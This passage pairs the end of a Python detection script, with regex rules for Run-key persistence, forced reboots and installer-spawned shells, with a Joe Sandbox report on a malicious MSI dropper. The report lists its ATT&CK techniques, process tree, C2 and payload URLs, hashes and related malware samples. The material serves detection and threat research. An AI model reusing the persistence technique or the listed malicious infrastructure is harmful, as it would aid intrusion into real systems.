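USER_WRITABLE_PARTS = ("\\appdata\\", "\\temp\\")
NON_INTERACTIVE_PARENTS = {"msiexec.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}

# "reg add <HK...\CurrentVersion\Run|RunOnce>" anywhere in a command line, so the
# cmd.exe wrapper ("start /MIN reg add ...") matches as well as reg.exe itself.
RUN_KEY_RE = re.compile(r'\breg(?:\.exe)?\s+add\s+"?(hk[a-z0-9_]+\\[^"\s]*?currentversion\\run(?:once)?)\b', re.I)
RUN_DATA_RE = re.compile(r'/d\s+(?:"([^"]*)"|(\S+))', re.I)
TIMEOUT_RE = re.compile(r'/t\s+(\d+)', re.I)


def _base(path):
    return os.path.basename(path.replace("\\", "/")).lower()


def is_user_writable(path):
    p = path.lower()
    return p.startswith(USER_WRITABLE_PREFIXES) or any(part in p for part in USER_WRITABLE_PARTS)


def rule_run_key_user_writable(ev):
    """Run-key value whose data points into a user-writable location."""
    key = RUN_KEY_RE.search(ev.command_line)
    data = RUN_DATA_RE.search(ev.command_line)
    if not key or not data:
        return None
    target = data.group(1) or data.group(2)
    if not is_user_writable(target):
        return None
    return {"rule": "run_key_user_writable_path", "key": key.group(1), "target": target}


def rule_installer_forced_reboot(ev):
    """shutdown.exe with /r and /f launched by a non-interactive parent."""
    if _base(ev.image) != "shutdown.exe" or _base(ev.parent_image) not in NON_INTERACTIVE_PARENTS:
        return None
    flags = {tok.lower() for tok in ev.command_line.split()}
    if not {"/r", "/f"} <= flags:
        return None
    t = TIMEOUT_RE.search(ev.command_line)
    return {"rule": "installer_forced_reboot", "timeout_seconds": int(t.group(1)) if t else None}


def rule_installer_spawns_shell(ev):
    """msiexec.exe starting a command interpreter (custom action running a shell)."""
    if _base(ev.parent_image) == "msiexec.exe" and _base(ev.image) in {"cmd.exe", "powershell.exe"}:
        return {"rule": "installer_spawns_shell"}
    return None


RULES = (rule_run_key_user_writable, rule_installer_forced_reboot, rule_installer_spawns_shell)


def evaluate(events):
    """Run every rule over every event; each finding carries the image it fired on."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hit["image"] = ev.image
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f)
```

Run over the constructed events the rules produce four findings, all on the three processes from the report, and nothing on the OneDrive control: the Run-key rule fires twice because both the cmd.exe wrapper and the reg.exe child carry the same command line, which is worth keeping rather than de-duplicating, since either one alone can be missing from a log.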
Source: PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003336000.00000004.00000800.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003396000.00000004.00000800.00020000.00000000.sdmp, PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000364C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_0042622C cpuid
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation (5 occurrences)
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Queries volume information: C:\Users\Public\PeFI\vJrY\WebView2Loader.dll VolumeInformation
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Code function: 12_2_00425626 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime
Source: C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\msiexec.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK matrix. Only the techniques the report matched are listed, grouped by tactic; the number in brackets is the badge shown in that matrix cell. Tactics with no matched technique (Reconnaissance, Resource Development, Credential Access, Lateral Movement, Exfiltration) are omitted.

Initial Access: Replication Through Removable Media [1]
Execution: Windows Management Instrumentation [3]
Persistence: DLL Side-Loading [1]; Registry Run Keys / Startup Folder [1]
Privilege Escalation: DLL Side-Loading [1]; Process Injection [12]; Registry Run Keys / Startup Folder [1]
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [21]; Software Packing [1]; Timestomp [1]; DLL Side-Loading [1]; File Deletion [1]; Masquerading [31]; Modify Registry [1]; Virtualization/Sandbox Evasion [41]; Process Injection [12]
Discovery: System Time Discovery [1]; Peripheral Device Discovery [11]; File and Directory Discovery [3]; System Information Discovery [45]; Security Software Discovery [51]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]
Collection: Archive Collected Data [1]
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]
Impact: System Shutdown/Reboot [1]
Behavior Graph ID: 1486731 | Sample: 9rybs.msi | Startdate: 02/08/2024 | Architecture: WINDOWS | Score: 64

Graph-level signatures: Sigma detected: New RUN Key Pointing to Suspicious Folder; Machine Learning detection for dropped file; AI detected suspicious sample; 2 other signatures.
Contacted hosts: yznv.prefintions.pro; fp2e7a.wpc.phicdn.net; 3 other IPs or domains.

Process tree (bracketed numbers are the per-process badges shown in the graph, which its legend names "Number of created Registry Values" and "Number of created Files"; a single number is reproduced as shown):

Start
  msiexec.exe [3, 23]
    dropped: C:\Windows\Installer\MSI9F25.tmp (PE32); C:\Windows\Installer\MSI7033.tmp (PE32); C:\Windows\Installer\MSI7003.tmp (PE32); 7 other malicious files
    msiexec.exe [2, 69]
      network: yznv.prefintions.pro 188.114.97.3, remote port 443, local ports 49706, 49707 (CLOUDFLARENETUS, European Union); collect.installeranalytics.com 52.54.161.79, remote port 80, local port 49710 (AMAZON-AESUS, United States)
      dropped: C:\Users\Public\PeFI\vJrY\vJrY.png (copy) (PE32); C:\Users\...\WebView2Loader.dll.png (copy) (PE32); C:\Users\Public\...\WebView2Loader.dll (copy) (PE32); 5 other files (3 malicious)
      signature: Uses shutdown.exe to shutdown or reboot the system
      cmd.exe [1]
        reg.exe [1, 1]
          conhost.exe
        conhost.exe
      shutdown.exe [1]
        conhost.exe
  PeFIvJrY.exe [15, 3]
    network: 20.15.106.83, remote port 80, local port 49712 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
  PeFIvJrY.exe
  msiexec.exe [2]

Sample:
Source | Detection | Scanner
9rybs.msi | 8% | ReversingLabs

Dropped files:
Source | Detection | Scanner
C:\Users\Public\PeFI\vJrY\PeFI.png | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\shi64B2.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6530.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6185.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI62DE.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI635C.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6467.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6487.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6F17.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6F47.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI7003.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI7033.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI9F25.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
URLs:
Source | Detection | Scanner | Label
https://www.thawte.com/cps0/ | 0% | URL Reputation | safe
https://www.thawte.com/repository0W | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://collect.installeranalytics.com/ | 0% | Avira URL Cloud | safe
http://html4/loose.dtd | 0% | Avira URL Cloud | safe
http://20.15.106.83/SCP/index.php?VS=VS3&PL=NAO | 0% | Avira URL Cloud | safe
https://yznv.prefintions.pro/derrama.png | 0% | Avira URL Cloud | safe
http://stackoverflow.com/q/11564914; | 0% | Avira URL Cloud | safe
https://www.foxit.com/pt-br/pdf-editor/adobe-acrobat-alternative.html | 0% | Avira URL Cloud | safe
https://acons2020temix54.lisf | 0% | Avira URL Cloud | safe
http://20.15.106.83 | 0% | Avira URL Cloud | safe
https://www.advancedinstaller.com | 0% | Avira URL Cloud | safe
http://20.15.106.83/SCP/index.php | 0% | Avira URL Cloud | safe
http://.css | 0% | Avira URL Cloud | safe
http://www.mcafee.com | 0% | Avira URL Cloud | safe
https://yznv.prefintions.pro/carol1.png | 0% | Avira URL Cloud | safe
http://.jpg | 0% | Avira URL Cloud | safe
http://collect.installeranalytics.com | 0% | Avira URL Cloud | safe
http://stackoverflow.com/q/2152978/23354 | 0% | Avira URL Cloud | safe
http://stackoverflow.com/q/14436606/WAsReference | 0% | Avira URL Cloud | safe
https://acons2020temix54.lisf/ | 0% | Avira URL Cloud | safe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic | 0% | Avira URL Cloud | safe
https://collect.installeranalytics.com | 0% | Avira URL Cloud | safe
http://stackoverflow.com/q/14436606/ | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
collect.installeranalytics.com | 52.54.161.79 | true | false | (none) | unknown
yznv.prefintions.pro | 188.114.97.3 | true | false | (none) | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | (none) | unknown
acons2020temix54.lisf | unknown | unknown | false | (none) | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://yznv.prefintions.pro/derrama.png | false | Avira URL Cloud: safe | unknown
http://collect.installeranalytics.com/ | false | Avira URL Cloud: safe | unknown
http://20.15.106.83/SCP/index.php?VS=VS3&PL=NAO | true | Avira URL Cloud: safe | unknown
https://yznv.prefintions.pro/carol1.png | false | Avira URL Cloud: safe | unknown
URLs found in memory or dropped files:
Name | Source | Malicious | Antivirus Detection | Reputation
http://html4/loose.dtd | shi64B2.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://20.15.106.83/SCP/index.php | PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.thawte.com/cps0/ | 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | false | URL Reputation: safe | unknown
https://www.thawte.com/repository0W | 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | false | URL Reputation: safe | unknown
https://acons2020temix54.lisf | PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://20.15.106.83 | PeFIvJrY.exe, 0000000C.00000002.3847929255.00000000032FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://stackoverflow.com/q/11564914; | PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | false | Avira URL Cloud: safe | unknown
https://www.advancedinstaller.com | 9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.dr | false | Avira URL Cloud: safe | unknown
https://www.foxit.com/pt-br/pdf-editor/adobe-acrobat-alternative.html | 9rybs.msi, 495fa1.msi.2.dr | false | Avira URL Cloud: safe | unknown
http://www.mcafee.com | vJrY.png.3.dr | false | Avira URL Cloud: safe | unknown
http://collect.installeranalytics.com | 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr | false | Avira URL Cloud: safe | unknown
http://.css | shi64B2.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://.jpg | shi64B2.tmp.3.dr | false | Avira URL Cloud: safe | unknown
http://stackoverflow.com/q/14436606/WAsReference | PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | false | Avira URL Cloud: safe | unknown
http://stackoverflow.com/q/2152978/23354 | PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.dr | false | Avira URL Cloud: safe | unknown
https://acons2020temix54.lisf/ | PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://collect.installeranalytics.com | 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr | false | Avira URL Cloud: safe | unknown
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic | 9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.dr | false | Avira URL Cloud: safe | unknown
http://stackoverflow.com/q/14436606/ | PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003336000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | yznv.prefintions.pro | European Union | 13335 | CLOUDFLARENETUS | false
52.54.161.79 | collect.installeranalytics.com | United States | 14618 | AMAZON-AESUS | false
20.15.106.83 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1486731
          Start date and time:2024-08-02 14:15:45 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 31s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:18
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:9rybs.msi
          Detection:MAL
          Classification:mal64.rans.evad.winMSI@15/33@3/3
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 90%
          • Number of executed functions: 59
          • Number of non-executed functions: 177
          Cookbook Comments:
          • Found application associated with file extension: .msi
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 13.85.23.86, 13.85.23.206, 20.3.187.198, 20.12.23.50
          • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target PeFIvJrY.exe, PID 7896 because there are no executed function
          • Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: 9rybs.msi
Time | Type | Description
08:16:43 | API Interceptor | 3x Sleep call for process: msiexec.exe modified
08:17:15 | API Interceptor | 6006825x Sleep call for process: PeFIvJrY.exe modified
13:16:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PeFIvJrY C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
13:17:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PeFIvJrY C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
Context: other samples sharing an indicator with this analysis. Columns: Associated Sample Name / URL | Detection | Threat Name | Context.

Match: 188.114.97.3
QUOTATION_JULQTRA071244#U00faPDF.scr | malicious | Unknown | filetransfer.io/data-package/eivFTmO7/download
QUOTATION_JULQTRA071244#U00faPDF.scr | malicious | Unknown | filetransfer.io/data-package/eivFTmO7/download
QUOTATION_JULQTRA071244#U00faPDF.scr | malicious | Unknown | filetransfer.io/data-package/eivFTmO7/download
bSecDbrnMO4yqnP.exe | malicious | FormBook, PureLog Stealer | www.uptocryptonews.com/ps15/?Bh=21AMTVr7VpXBosKFppEf26A/DeLfMm5QpmuaUPr99aq4XrKOrkrAajUh1DEbTobQjDw5&DxoLiH=dbYdUphHwt44W
2024MSASI056553A.exe | malicious | FormBook | www.globaltrend.xyz/srh8/
PO-00349.xls | malicious | Remcos | fd.ax/2Jv
swift copy.exe | malicious | FormBook | www.alphacentura.com/mnr7/
RkvSAimoIv.exe | malicious | DCRat, PureLog Stealer, zgRAT | 266468cm.nyashka.top/imagePhpPacketGameBigloadprotecttrafficDatalifeDleLocal.php
PO-00349.xls | malicious | Remcos | ft.ax/
PO-00349.xls | malicious | Remcos | ft.ax/k7B

Match: collect.installeranalytics.com
LisectAVT_2403002A_47.exe | malicious | WinLocker | 54.158.164.30
WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi | malicious | FatalRAT, GhostRat, Nitol | 54.224.49.0
0cjB1Kh8zU.msi | malicious | Unknown | 54.165.254.88
2ztvLMT477.msi | malicious | Unknown | 54.227.134.57
ahx8PyqunR.msi | malicious | Unknown | 54.221.197.204
speke.msi | malicious | Unknown | 54.165.34.233
d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 54.158.107.210
d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 54.158.107.210
69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exe | malicious | Unknown | 52.7.13.177
w1J9KDIC0m.exe | malicious | Unknown | 52.7.13.177

Match: fp2e7a.wpc.phicdn.net
https://pakbutton.com.pk/mailbox/upgrade/25GB/client | malicious | Unknown | 192.229.221.95
https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013 | malicious | Unknown | 192.229.221.95
https://pakbutton.com.pk | malicious | Unknown | 192.229.221.95
https://pub-fc3b3bfaa8f54a1b8d8485fe0bfe792b.r2.dev/HK.html#christa.claes@daiichi-sankyo.de | malicious | HTMLPhisher | 192.229.221.95
https://www.bing.com/ck/a?!&&p=7522cfa299d94e97JmltdHM9MTcyMjQ3MDQwMCZpZ3VpZD0wZjk2ODVjNi05NDg0LTY3YzQtMGM5MS05MTBlOTU3NjY2YzkmaW5zaWQ9NTEzMA&ptn=3&ver=2&hsh=3&fclid=0f9685c6-9484-67c4-0c91-910e957666c9&u=a1aHR0cHM6Ly93d3cuaG4taG5wcmludGVyLmNvbS9pbnRlcm5hdGlvbmFsLWNsaWVudHMv& | malicious | HTMLPhisher | 192.229.221.95
https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/ | malicious | Unknown | 192.229.221.95
https://workdrive.zohopublic.eu/file/1n0t05e999a7f921c44b69aef1f2423b63f55 | malicious | Unknown | 192.229.221.95
http://82.192.82.226 | malicious | Unknown | 192.229.221.95
https://hij.koc.mybluehost.me/Z/ | malicious | Unknown | 192.229.221.95
http://www.foodmate.net | malicious | Unknown | 192.229.221.95

Match: CLOUDFLARENETUS
ATPrSVPS6D.exe | malicious | LummaC | 188.114.97.3
HQE5DRlPBT.exe | malicious | FormBook | 172.67.148.153
PLC7VOI78L.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
e8VyDhZmDR.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
The Situ Group Ltd.pdf | malicious | HTMLPhisher | 104.17.25.14
3gleLIabQq.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
6ddrUd6iQo.exe | malicious | FormBook | 188.114.96.3
https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013 | malicious | Unknown | 172.66.0.145
SNu4RXZpoS.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
n2SgyJt0GY.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3

Match: AMAZON-AESUS
XCXxJoAEaF.elf | malicious | Mirai, Moobot | 54.140.120.60
js8call-2.2.0-win32.exe | malicious | Unknown | 52.44.76.40
rf4LFk7Nvv.elf | malicious | Mirai | 34.197.64.214
https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013 | malicious | Unknown | 3.212.100.132
E66M3O2493.elf | malicious | Unknown | 34.224.62.170
3AV1PyEQ16.elf | malicious | Unknown | 54.19.4.177
https://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29 | malicious | Unknown | 52.73.59.20
http://telstra-103141.weeblysite.com/ | malicious | Unknown | 3.228.185.195
http://telstra-107250.weeblysite.com/ | malicious | HTMLPhisher | 3.228.185.195
http://telstra-108674.weeblysite.com/ | malicious | Unknown | 54.235.101.7

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
mQeV8nCFUa.elf | malicious | Mirai | 104.41.106.230
ZxHHuJB911.elf | malicious | Mirai | 159.27.104.104
XAjV9ghiIb.elf | malicious | Mirai, Moobot | 51.122.227.27
rf4LFk7Nvv.elf | malicious | Mirai | 13.105.137.162
JSd25Gusnc.elf | malicious | Mirai | 20.21.196.35
ZeHA1CMTQq.elf | malicious | Mirai | 40.108.185.46
E66M3O2493.elf | malicious | Unknown | 13.100.15.114
3AV1PyEQ16.elf | malicious | Unknown | 52.177.85.34
0lMevtsZn2.elf | malicious | Mirai | 102.133.226.218
XtkUbewN09.elf | malicious | Mirai, Moobot | 20.71.71.245

Match: a0e9f5d64349fb13191bc781f81f42e1
ATPrSVPS6D.exe | malicious | LummaC | 188.114.97.3
f1d9f80142a942bbd5af2ec4f6cc96a0 | malicious | Unknown | 188.114.97.3
360a2293292ccc65368cab8ceee90670 | malicious | Unknown | 188.114.97.3
dxkqdn.msi | malicious | Unknown | 188.114.97.3
ver.dat.msi | malicious | Unknown | 188.114.97.3
uzlts.msi | malicious | Unknown | 188.114.97.3
SecuriteInfo.com.FileRepMalware.20211.23157.exe | malicious | DBatLoader | 188.114.97.3
SecuriteInfo.com.FileRepMalware.20211.23157.exe | malicious | DBatLoader | 188.114.97.3
setup8803165981.exe | malicious | Unknown | 188.114.97.3
Uduknnywyznljn.exe | malicious | Remcos, DBatLoader | 188.114.97.3

Match: C:\Users\user\AppData\Local\Temp\shi64B2.tmp
LisectAVT_2403002B_409.exe | malicious | Bdaejec
AnyDesk.msi | malicious | Unknown
LisectAVT_2403002B_493.exe | malicious | Unknown
LisectAVT_2403002B_493.exe | malicious | Unknown
WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi | malicious | FatalRAT, GhostRat, Nitol
0cjB1Kh8zU.msi | malicious | Unknown
2ztvLMT477.msi | malicious | Unknown
ahx8PyqunR.msi | malicious | Unknown
speke.msi | malicious | Unknown
d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):358000
                              Entropy (8bit):7.242791638339027
                              Encrypted:false
                              SSDEEP:6144:zw4WNZknl8n6n33FxsZK2dx8ltV0Funq3QgiR3xtQAmUPP+UX32U+rv4T+rvS:zw9mSny3rGKV/0gnG8R3xtj1PP+C32U/
                              MD5:65CD1FFDB524F091FC06884DCB1270F9
                              SHA1:5AC35832CC0DCE15799565D605B12FD15ADB4DC7
                              SHA-256:32573224BE0A365DD4A94E5D7812D9CC98B4ACB60A3E85B2B8EA97EB2377E81D
                              SHA-512:BA9B6EFD5B8815628AAD54FCB7FB4AFB4C041D7B7140754259D7355728E388A371F81DD58F1D9CE3483D0D70F05EBC771EB6F3022EF17A0DB2A76273FB2F69D9
                              Malicious:true
                              Reputation:low
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........g....}...}...}-..|...}-..|[..}...|...}...|...}...|...}E..|...}-..|...}-..|...}-..|...}...}...}...}{..}E..|...}E..}...}...}...}E..|...}Rich...}................PE..L...Y..e.................P..........p.............@.......................................@................................................................... ..................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):702976
                              Entropy (8bit):4.9566523846266755
                              Encrypted:false
                              SSDEEP:6144:n3cKjnv2eBLM6XxJ7UBebH6dEM4JjQvpi1p+e+WRc3RPMTNm:NwetyebH6dK3p+bsNm
                              MD5:27563EEA952684C3E2F5A35A81E021DF
                              SHA1:BC46C79DACE897088F989D3A34757D7592110B7D
                              SHA-256:EADCC6AD7B87CD61D5899A45D08A9D9897AFA62810048E1F1D448C696543EF46
                              SHA-512:9DB1BA740B7B1BD386751BD7EA1CF8BDF30D3A139F0AF81B2D652DBEA9153CE8038EAAE084DDF4F3136560BD00B68A8040C84DE1115658CF5B2E1C31CF99718A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7).f...........!..................... ........... ....................... ............@.........................L...(.......O.... ..`....................@..0.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...`.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):358000
                              Entropy (8bit):7.242791638339027
                              Encrypted:false
                              SSDEEP:6144:zw4WNZknl8n6n33FxsZK2dx8ltV0Funq3QgiR3xtQAmUPP+UX32U+rv4T+rvS:zw9mSny3rGKV/0gnG8R3xtj1PP+C32U/
                              MD5:65CD1FFDB524F091FC06884DCB1270F9
                              SHA1:5AC35832CC0DCE15799565D605B12FD15ADB4DC7
                              SHA-256:32573224BE0A365DD4A94E5D7812D9CC98B4ACB60A3E85B2B8EA97EB2377E81D
                              SHA-512:BA9B6EFD5B8815628AAD54FCB7FB4AFB4C041D7B7140754259D7355728E388A371F81DD58F1D9CE3483D0D70F05EBC771EB6F3022EF17A0DB2A76273FB2F69D9
                              Malicious:true
                              Reputation:low
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........g....}...}...}-..|...}-..|[..}...|...}...|...}...|...}E..|...}-..|...}-..|...}-..|...}...}...}...}{..}E..|...}E..}...}...}...}E..|...}Rich...}................PE..L...Y..e.................P..........p.............@.......................................@................................................................... ..................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!....
                              Process:C:\Windows\SysWOW64\msiexec.exe
